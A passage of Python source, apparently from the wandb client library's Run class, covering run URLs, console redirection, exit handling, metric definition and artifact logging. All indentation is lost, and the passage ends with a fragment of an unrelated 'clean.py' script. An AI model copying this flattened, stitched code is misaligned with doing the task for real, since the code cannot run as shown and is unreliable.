self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _get_url_query_string(self):
s = self._settings
# TODO(jhr): migrate to new settings, but for now this is safer
api = internal.Api()
if api.settings().get("anonymous") != "true":
return ""
api_key = apikey.api_key(settings=s)
return "?" + urlencode({"apiKey": api_key})
def _get_project_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), qs
)
return url
def _get_run_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}/runs/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), url_quote(r.run_id), qs
)
return url
def _get_sweep_url(self):
"""Generate a url for a sweep.
Returns:
(str): url if the run is part of a sweep
(None): if the run is not part of the sweep
"""
r = self._run_obj
if not r:
return ""
sweep_id = r.sweep_id
if not sweep_id:
return ""
app_url = wandb.util.app_url(self._settings.base_url)
qs = self._get_url_query_string()
return "{base}/{entity}/{project}/sweeps/{sweepid}{qs}".format(
base=app_url,
entity=url_quote(r.entity),
project=url_quote(r.project),
sweepid=url_quote(sweep_id),
qs=qs,
)
def _get_run_name(self):
r = self._run_obj
if not r:
return ""
return r.display_name
def _display_run(self):
project_url = self._get_project_url()
run_url = self._get_run_url()
sweep_url = self._get_sweep_url()
version_str = "Tracking run with wandb version {}".format(wandb.__version__)
if self.resumed:
run_state_str = "Resuming run"
else:
run_state_str = "Syncing run"
run_name = self._get_run_name()
app_url = wandb.util.app_url(self._settings.base_url)
sync_dir = self._settings._sync_dir
if self._settings._jupyter:
sync_dir = "<code>{}</code>".format(sync_dir)
dir_str = "Run data is saved locally in {}".format(sync_dir)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
sweep_line = (
'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
sweep_url, sweep_url
)
if sweep_url
else ""
)
docs_html = '<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">(Documentation)</a>' # noqa: E501
ipython.display_html(
"""
{}<br/>
{} <strong style="color:{}">{}</strong> to <a href="{}" target="_blank">Weights & Biases</a> {}.<br/>
Project page: <a href="{}" target="_blank">{}</a><br/>
{}Run page: <a href="{}" target="_blank">{}</a><br/>
{}<br/><br/>
""".format( # noqa: E501
version_str,
run_state_str,
RUN_NAME_COLOR,
run_name,
app_url,
docs_html,
project_url,
project_url,
sweep_line,
run_url,
run_url,
dir_str,
)
)
else:
wandb.termlog(version_str)
wandb.termlog(
"{} {}".format(run_state_str, click.style(run_name, fg="yellow"))
)
emojis = dict(star="", broom="", rocket="")
if platform.system() != "Windows" and sys.stdout.encoding == "UTF-8":
emojis = dict(star="⭐️", broom="🧹", rocket="🚀")
wandb.termlog(
"{} View project at {}".format(
emojis.get("star", ""),
click.style(project_url, underline=True, fg="blue"),
)
)
if sweep_url:
wandb.termlog(
"{} View sweep at {}".format(
emojis.get("broom", ""),
click.style(sweep_url, underline=True, fg="blue"),
)
)
wandb.termlog(
"{} View run at {}".format(
emojis.get("rocket", ""),
click.style(run_url, underline=True, fg="blue"),
)
)
wandb.termlog(dir_str)
if not self._settings._offline:
wandb.termlog("Run `wandb offline` to turn off syncing.")
print("")
def _redirect(
self,
stdout_slave_fd,
stderr_slave_fd,
console = None,
):
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
# out_redir: redirect.RedirectBase
# err_redir: redirect.RedirectBase
if console == self._settings.Console.REDIRECT:
logger.info("Redirecting console.")
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback():
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=self._settings.Console.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == self._settings.Console.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == self._settings.Console.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
def _restore(self):
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
def _atexit_cleanup(self, exit_code = None):
if self._backend is None:
logger.warning("process exited without backend configured")
return
if self._atexit_cleanup_called:
return
self._atexit_cleanup_called = True
exit_code = exit_code or self._hooks.exit_code if self._hooks else 0
logger.info("got exitcode: %d", exit_code)
if exit_code == 0:
# Cleanup our resume file on a clean exit
if os.path.exists(self._settings.resume_fname):
os.remove(self._settings.resume_fname)
self._exit_code = exit_code
try:
self._on_finish()
except KeyboardInterrupt as ki:
if wandb.wandb_agent._is_running():
raise ki
wandb.termerror("Control-C detected -- Run data was not synced")
if ipython._get_python_type() == "python":
os._exit(-1)
except Exception as e:
self._console_stop()
self._backend.cleanup()
logger.error("Problem finishing run", exc_info=e)
wandb.termerror("Problem finishing run")
traceback.print_exception(*sys.exc_info())
if ipython._get_python_type() == "python":
os._exit(-1)
else:
# if silent, skip this as it is used to output stuff
if self._settings._silent:
return
self._on_final()
def _console_start(self):
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self):
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self):
self._show_version_info()
def _on_start(self):
# TODO: make offline mode in jupyter use HTML
if self._settings._offline:
wandb.termlog(
(
"W&B syncing is set to `offline` in this directory. "
"Run `wandb online` or set WANDB_MODE=online to enable cloud syncing."
)
)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
if self._run_obj and not self._settings._silent:
self._display_run()
if self._backend and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
def _pusher_print_status(
self,
progress,
prefix = True,
done = False,
):
if self._settings._offline:
return
line = " %.2fMB of %.2fMB uploaded (%.2fMB deduped)\r" % (
progress.uploaded_bytes / 1048576.0,
progress.total_bytes / 1048576.0,
progress.deduped_bytes / 1048576.0,
)
if self._jupyter_progress:
# percent_done: float
if progress.total_bytes == 0:
percent_done = 1
else:
percent_done = progress.uploaded_bytes / progress.total_bytes
self._jupyter_progress.update(percent_done, line)
if done:
self._jupyter_progress.close()
elif not self._settings._jupyter:
spinner_states = ["-", "\\", "|", "/"]
line = spinner_states[self._progress_step % 4] + line
self._progress_step += 1
wandb.termlog(line, newline=False, prefix=prefix)
if done:
dedupe_fraction = (
progress.deduped_bytes / float(progress.total_bytes)
if progress.total_bytes > 0
else 0
)
if dedupe_fraction > 0.01:
wandb.termlog(
"W&B sync reduced upload amount by %.1f%% "
% (dedupe_fraction * 100),
prefix=prefix,
)
# clear progress line.
wandb.termlog(" " * 79, prefix=prefix)
def _on_finish_progress(self, progress, done = None):
self._pusher_print_status(progress, done=done)
def _wait_for_finish(self):
while True:
if self._backend:
poll_exit_resp = self._backend.interface.communicate_poll_exit()
logger.info("got exit ret: %s", poll_exit_resp)
if poll_exit_resp:
done = poll_exit_resp.done
pusher_stats = poll_exit_resp.pusher_stats
if pusher_stats:
self._on_finish_progress(pusher_stats, done)
if done:
return poll_exit_resp
time.sleep(0.1)
def _on_finish(self):
trigger.call("on_finished")
# populate final import telemetry
with telemetry.context(run=self) as tel:
self._telemetry_imports(tel.imports_finish)
if self._run_status_checker:
self._run_status_checker.stop()
# make sure all uncommitted history is flushed
self.history._flush()
self._console_stop() # TODO: there's a race here with jupyter console logging
if not self._settings._silent:
if self._backend:
pid = self._backend._internal_pid
status_str = "Waiting for W&B process to finish, PID {}".format(pid)
if not self._exit_code:
status_str += "\nProgram ended successfully."
else:
status_str += "\nProgram failed with code {}. ".format(self._exit_code)
if not self._settings._offline:
status_str += " Press ctrl-c to abort syncing."
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html("<br/>" + status_str.replace("\n", "<br/>"))
else:
print("")
wandb.termlog(status_str)
# telemetry could have changed, publish final data
if self._backend:
self._backend.interface.publish_telemetry(self._telemetry_obj)
# TODO: we need to handle catastrophic failure better
# some tests were timing out on sending exit for reasons not clear to me
if self._backend:
self._backend.interface.publish_exit(self._exit_code)
# Wait for data to be synced
self._poll_exit_response = self._wait_for_finish()
if self._backend:
ret = self._backend.interface.communicate_summary()
self._final_summary = proto_util.dict_from_proto_list(ret.item)
if self._backend:
ret = self._backend.interface.communicate_sampled_history()
d = {item.key: item.values_float or item.values_int for item in ret.item}
self._sampled_history = d
if self._backend:
self._backend.cleanup()
if self._run_status_checker:
self._run_status_checker.join()
def _on_final(self):
# check for warnings and errors, show log file locations
if self._reporter:
# TODO: handle warnings and errors nicely in jupyter
warning_lines = self._reporter.warning_lines
if warning_lines:
wandb.termlog("Warnings:")
for line in warning_lines:
wandb.termlog(line)
if len(warning_lines) < self._reporter.warning_count:
wandb.termlog("More warnings")
error_lines = self._reporter.error_lines
if error_lines:
wandb.termlog("Errors:")
for line in error_lines:
wandb.termlog(line)
if len(error_lines) < self._reporter.error_count:
wandb.termlog("More errors")
if self._settings.log_user:
log_user = self._settings.log_user
if self._settings._jupyter:
log_user = "<code>{}</code>".format(log_user)
log_str = "Find user logs for this run at: {}".format(log_user)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
if self._settings.log_internal:
log_internal = self._settings.log_internal
if self._settings._jupyter:
log_internal = "<code>{}</code>".format(log_internal)
log_str = "Find internal logs for this run at: {}".format(log_internal)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
self._show_summary()
self._show_history()
self._show_files()
if self._run_obj:
run_url = self._get_run_url()
run_name = self._get_run_name()
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(
"""
<br/>Synced <strong style="color:{}">{}</strong>: <a href="{}" target="_blank">{}</a><br/>
""".format(
RUN_NAME_COLOR, run_name, run_url, run_url
)
)
else:
wandb.termlog(
"\nSynced {}: {}".format(
click.style(run_name, fg="yellow"),
click.style(run_url, fg="blue"),
)
)
if self._settings._offline:
# TODO: handle jupyter offline messages
wandb.termlog("You can sync this run to the cloud by running:")
wandb.termlog(
click.style(
"wandb sync {}".format(self._settings._sync_dir), fg="yellow"
)
)
self._show_version_info(footer=True)
def _show_version_info(self, footer = None):
package_problem = False
if self._deleted_version_message:
wandb.termerror(self._deleted_version_message)
package_problem = True
elif self._yanked_version_message:
wandb.termwarn(self._yanked_version_message)
package_problem = True
# only display upgrade message if packages are bad or in header
if not footer or package_problem:
if self._upgraded_version_message:
wandb.termlog(self._upgraded_version_message)
def _show_summary(self):
if self._final_summary:
logger.info("rendering summary")
max_len = max([len(k) for k in self._final_summary.keys()])
format_str = " {:>%s} {}" % max_len
summary_rows = []
for k, v in iteritems(self._final_summary):
# arrays etc. might be too large. for now we just don't print them
if isinstance(v, string_types):
if len(v) >= 20:
v = v[:20] + "..."
summary_rows.append((k, v))
elif isinstance(v, numbers.Number):
if isinstance(v, float):
v = round(v, 5)
summary_rows.append((k, v))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
summary_table = ipython.STYLED_TABLE_HTML
for row in summary_rows:
summary_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
summary_table += "</table>"
ipython.display_html("<h3>Run summary:</h3><br/>" + summary_table)
else:
summary_lines = "\n".join(
[format_str.format(k, v) for k, v in summary_rows]
)
wandb.termlog("Run summary:")
wandb.termlog(summary_lines)
def _show_history(self):
if not self._sampled_history:
return
# Only print sparklines if the terminal is utf-8
# In some python 2.7 tests sys.stdout is a 'cStringIO.StringO' object
# which doesn't have the attribute 'encoding'
encoding = getattr(sys.stdout, "encoding", None)
if not encoding or encoding.upper() not in ("UTF_8", "UTF-8",):
return
logger.info("rendering history")
max_len = max([len(k) for k in self._sampled_history])
history_rows = []
for key in self._sampled_history:
vals = wandb.util.downsample(self._sampled_history[key], 40)
if any((not isinstance(v, numbers.Number) for v in vals)):
continue
line = sparkline.sparkify(vals)
history_rows.append((key, line))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
history_table = ipython.STYLED_TABLE_HTML
for row in history_rows:
history_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
history_table += "</table>"
ipython.display_html("<h3>Run history:</h3><br/>" + history_table + "<br/>")
else:
wandb.termlog("Run history:")
history_lines = ""
format_str = " {:>%s} {}\n" % max_len
for row in history_rows:
history_lines += format_str.format(*row)
wandb.termlog(history_lines)
def _show_files(self):
if not self._poll_exit_response or not self._poll_exit_response.file_counts:
return
if self._settings._offline:
return
logger.info("logging synced files")
if self._settings._silent:
return
file_str = "Synced {} W&B file(s), {} media file(s), {} artifact file(s) and {} other file(s)".format( # noqa:E501
self._poll_exit_response.file_counts.wandb_count,
self._poll_exit_response.file_counts.media_count,
self._poll_exit_response.file_counts.artifact_count,
self._poll_exit_response.file_counts.other_count,
)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(file_str)
else:
wandb.termlog(file_str)
def _save_job_spec(self):
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = (dict(self._config),)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
def define_metric(
self,
name,
step_metric = None,
step_sync = None,
hidden = None,
summary = None,
goal = None,
overwrite = None,
**kwargs
):
"""Define metric properties which will later be logged with `wandb.log()`.
Arguments:
name: Name of the metric.
step_metric: Independent variable associated with the metric.
step_sync: Automatically add `step_metric` to history if needed.
Defaults to True if step_metric is specified.
hidden: Hide this metric from automatic plots.
summary: Specify aggregate metrics added to summary.
Supported aggregations: "min,max,mean,best,last,none"
Default aggregation is `copy`
Aggregation `best` defaults to `goal`==`minimize`
goal: Specify direction for optimizing the metric.
Supported direections: "minimize,maximize"
Returns:
A metric object is returned that can be further specified.
"""
if not name:
raise wandb.Error("define_metric() requires non-empty name argument")
for k in kwargs:
wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
if isinstance(step_metric, wandb_metric.Metric):
step_metric = step_metric.name
for arg_name, arg_val, exp_type in (
("name", name, string_types),
("step_metric", step_metric, string_types),
("step_sync", step_sync, bool),
("hidden", hidden, bool),
("summary", summary, string_types),
("goal", goal, string_types),
("overwrite", overwrite, bool),
):
# NOTE: type checking is broken for isinstance and string_types
if arg_val is not None and not isinstance(arg_val, exp_type): # type: ignore
arg_type = type(arg_val).__name__
raise wandb.Error(
"Unhandled define_metric() arg: {} type: {}".format(
arg_name, arg_type
)
)
stripped = name[:-1] if name.endswith("*") else name
if "*" in stripped:
raise wandb.Error(
"Unhandled define_metric() arg: name (glob suffixes only): {}".format(
name
)
)
summary_ops = None
if summary:
summary_items = [s.lower() for s in summary.split(",")]
summary_ops = []
valid = {"min", "max", "mean", "best", "last", "copy", "none"}
for i in summary_items:
if i not in valid:
raise wandb.Error(
"Unhandled define_metric() arg: summary op: {}".format(i)
)
summary_ops.append(i)
goal_cleaned = None
if goal is not None:
goal_cleaned = goal[:3].lower()
valid_goal = {"min", "max"}
if goal_cleaned not in valid_goal:
raise wandb.Error(
"Unhandled define_metric() arg: goal: {}".format(goal)
)
m = wandb_metric.Metric(
name=name,
step_metric=step_metric,
step_sync=step_sync,
summary=summary_ops,
hidden=hidden,
goal=goal_cleaned,
overwrite=overwrite,
)
m._set_callback(self._metric_callback)
m._commit()
with telemetry.context(run=self) as tel:
tel.feature.metric = True
return m
# TODO(jhr): annotate this
def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None): # type: ignore
wandb.watch(models, criterion, log, log_freq, idx)
# TODO(jhr): annotate this
def use_artifact(self, artifact_or_name, type=None, aliases=None): # type: ignore
""" Declare an artifact as an input to a run, call `download` or `file` on
the returned object to get the contents locally.
Arguments:
artifact_or_name: (str or Artifact) An artifact name.
May be prefixed with entity/project. Valid names
can be in the following forms:
- name:version
- name:alias
- digest
You can also pass an Artifact object created by calling `wandb.Artifact`
type: (str, optional) The type of artifact to use.
aliases: (list, optional) Aliases to apply to this artifact
Returns:
An `Artifact` object.
"""
r = self._run_obj
api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
api.set_current_run_id(self.id)
if isinstance(artifact_or_name, str):
name = artifact_or_name
public_api = self._public_api()
artifact = public_api.artifact(type=type, name=name)
if type is not None and type != artifact.type:
raise ValueError(
"Supplied type {} does not match type {} of artifact {}".format(
type, artifact.type, artifact.name
)
)
api.use_artifact(artifact.id)
return artifact
else:
artifact = artifact_or_name
if aliases is None:
aliases = []
elif isinstance(aliases, str):
aliases = [aliases]
if isinstance(artifact_or_name, wandb.Artifact):
self._log_artifact(
artifact, aliases, is_user_created=True, use_after_commit=True
)
return artifact
elif isinstance(artifact, public.Artifact):
api.use_artifact(artifact.id)
return artifact
else:
raise ValueError(
'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), an instance of wandb.Artifact, or wandb.Api().artifact() to use_artifact' # noqa: E501
)
def log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
""" Declare an artifact as output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
Returns:
An `Artifact` object.
"""
return self._log_artifact(artifact_or_path, name, type, aliases)
def upsert_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Declare (or append tp) a non-finalized artifact as output of a run. Note that you must call
run.finish_artifact() to finalize the artifact. This is useful when distributed jobs
need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Finish a non-finalized artifact as output of a run. Subsequent "upserts" with
the same distributed ID will result in a new version
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
finalize = True,
is_user_created = False,
use_after_commit = False,
):
if not finalize and distributed_id is None:
raise TypeError("Must provide distributed_id if artifact is not finalize")
artifact, aliases = self._prepare_artifact(
artifact_or_path, name, type, aliases
)
artifact.distributed_id = distributed_id
self._assert_can_log_artifact(artifact)
if self._backend:
if not self._settings._offline:
future = self._backend.interface.communicate_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
else:
self._backend.interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
return artifact
def _public_api(self):
overrides = {"run": self.id}
run_obj = self._run_obj
if run_obj is not None:
overrides["entity"] = run_obj.entity
overrides["project"] = run_obj.project
return public.Api(overrides)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact): # type: ignore
if not self._settings._offline:
try:
public_api = self._public_api()
expected_type = public.Artifact.expected_type(
public_api.client,
artifact.name,
public_api.settings["entity"],
public_api.settings["project"],
)
except requests.exceptions.RequestException:
# Just return early if there is a network error. This is
# ok, as this function is intended to help catch an invalid
# type early, but not a hard requirement for valid operation.
return
if expected_type is not None and artifact.type != expected_type:
raise ValueError(
"Expected artifact type {}, got {}".format(
expected_type, artifact.type
)
)
def _prepare_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
aliases = aliases or ["latest"]
if isinstance(artifact_or_path, str):
if name is None:
name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
artifact = wandb.Artifact(name, type)
if os.path.isfile(artifact_or_path):
artifact.add_file(artifact_or_path)
elif os.path.isdir(artifact_or_path):
artifact.add_dir(artifact_or_path)
elif "://" in artifact_or_path:
artifact.add_reference(artifact_or_path)
else:
raise ValueError(
"path must be a file, directory or external"
"reference like s3://bucket/path"
)
else:
artifact = artifact_or_path
if not isinstance(artifact, wandb.Artifact):
raise ValueError(
"You must pass an instance of wandb.Artifact or a "
"valid file path to log_artifact"
)
if isinstance(aliases, str):
aliases = [aliases]
artifact.finalize()
return artifact, aliases
def alert(
self,
title,
text,
level = None,
wait_duration = None,
):
"""Launch an alert with the given title and text.
Arguments:
title: (str) The title of the alert, must be less than 64 characters long.
text: (str) The text body of the alert.
level: (str or wandb.AlertLevel, optional) The alert level to use, either: `INFO`, `WARN`, or `ERROR`.
wait_duration: (int, float, or timedelta, optional) The time to wait (in seconds) before sending another
alert with this title.
"""
level = level or wandb.AlertLevel.INFO
if isinstance(level, wandb.AlertLevel):
level = level.value
if level not in (
wandb.AlertLevel.INFO.value,
wandb.AlertLevel.WARN.value,
wandb.AlertLevel.ERROR.value,
):
raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
wait_duration = wait_duration or timedelta(minutes=1)
if isinstance(wait_duration, int) or isinstance(wait_duration, float):
wait_duration = timedelta(seconds=wait_duration)
elif not callable(getattr(wait_duration, "total_seconds", None)):
raise ValueError(
"wait_duration must be an int, float, or datetime.timedelta"
)
wait_duration = int(wait_duration.total_seconds() * 1000)
if self._backend:
self._backend.interface.publish_alert(title, text, level, wait_duration)
def __enter__(self):
return self
def __exit__(
self,
exc_type,
exc_val,
exc_tb,
):
exit_code = 0 if exc_type is None else 1
self.finish(exit_code)
return exc_type is None
def mark_preempting(self):
"""Mark this run as preempting and tell the internal process
to immediately report this to the server."""
if self._backend:
self._backend.interface.publish_preempting()
# We define this outside of the run context to support restoring before init
def restore(
name,
run_path = None,
replace = False,
root = None,
):
""" Downloads the specified file from cloud storage into the current directory
or run directory. By default this will only download the file if it doesn't
already exist.
Arguments:
name: the name of the file
run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
if wandb.init has not been called, this is required.
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
Returns:
None if it can't find the file, otherwise a file object open for reading
Raises:
wandb.CommError: if we can't connect to the wandb backend
ValueError: if the file is not found or can't find run_path
"""
is_disabled = wandb.run is not None and wandb.run.disabled
run = None if is_disabled else wandb.run
if run_path is None:
if run is not None:
run_path = run.path
else:
raise ValueError(
"run_path required when calling wandb.restore before wandb.init"
)
if root is None:
if run is not None:
root = run.dir
api = public.Api()
api_run = api.run(run_path)
if root is None:
root = os.getcwd()
path = os.path.join(root, name)
if os.path.exists(path) and replace is False:
return open(path, "r")
if is_disabled:
return None
files = api_run.files([name])
if len(files) == 0:
return None
# if the file does not exist, the file has an md5 of 0
if files[0].md5 == "0":
raise ValueError("File {} not found in {}.".format(name, run_path or root))
return files[0].download(root=root, replace=True)
# propigate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
def finish(exit_code = None):
"""
Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process.
We automatically call this method when your script exits.
"""
if wandb.run:
wandb.run.finish(exit_code=exit_code)
# propagate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
class _LazyArtifact(ArtifactInterface):
# _api: PublicApi
_instance = None
# _future: Any
def __init__(self, api, future):
self._api = api
self._future = future
def _assert_instance(self):
if not self._instance:
raise ValueError(
"Must call wait() before accessing logged artifact properties"
)
return self._instance
def __getattr__(self, item):
self._assert_instance()
return getattr(self._instance, item)
def wait(self):
if not self._instance:
resp = self._future.get().response.log_artifact_response
if resp.error_message:
raise ValueError(resp.error_message)
self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
assert isinstance(
self._instance, ArtifactInterface
), "Insufficient permissions to fetch Artifact with id {} from {}".format(
resp.artifact_id, self._api.client.app_url()
)
return self._instance
@property
def id(self):
return self._assert_instance().id
@property
def version(self):
return self._assert_instance().version
@property
def name(self):
return self._assert_instance().name
@property
def type(self):
return self._assert_instance().type
@property
def entity(self):
return self._assert_instance().entity
@property
def project(self):
return self._assert_instance().project
@property
def manifest(self):
return self._assert_instance().manifest
@property
def digest(self):
return self._assert_instance().digest
@property
def state(self):
return self._assert_instance().state
@property
def size(self):
return self._assert_instance().size
@property
def commit_hash(self):
return self._assert_instance().commit_hash
@property
def description(self):
return self._assert_instance().description
@description.setter
def description(self, desc):
self._assert_instance().description = desc
@property
def metadata(self):
return self._assert_instance().metadata
@metadata.setter
def metadata(self, metadata):
self._assert_instance().metadata = metadata
@property
def aliases(self):
return self._assert_instance().aliases
@aliases.setter
def aliases(self, aliases):
self._assert_instance().aliases = aliases
def used_by(self):
return self._assert_instance().used_by()
def logged_by(self):
return self._assert_instance().logged_by()
# Commenting this block out since this code is unreachable since LocalArtifact
# overrides them and therefore untestable.
# Leaving behind as we may want to support these in the future.
# def new_file(self, name: str, mode: str = "w") -> Any: # TODO: Refine Type
# return self._assert_instance().new_file(name, mode)
# def add_file(
# self,
# local_path: str,
# name: Optional[str] = None,
# is_tmp: Optional[bool] = False,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_file(local_path, name, is_tmp)
# def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
# return self._assert_instance().add_dir(local_path, name)
# def add_reference(
# self,
# uri: Union["ArtifactEntry", str],
# name: Optional[str] = None,
# checksum: bool = True,
# max_objects: Optional[int] = None,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_reference(uri, name, checksum, max_objects)
# def add(self, obj: "WBValue", name: str) -> Any: # TODO: Refine Type
# return self._assert_instance().add(obj, name)
def get_path(self, name):
return self._assert_instance().get_path(name)
def get(self, name):
return self._assert_instance().get(name)
def download(self, root = None, recursive = False):
return self._assert_instance().download(root, recursive)
def checkout(self, root = None):
return self._assert_instance().checkout(root)
def verify(self, root = None):
return self._assert_instance().verify(root)
def save(self):
return self._assert_instance().save()
def delete(self):
return self._assert_instance().delete()
|
clean.py
|
#!/usr/bin/env python3
"""
Clean each capnp recording of any unfinished writing as it will crash otherwise
"""
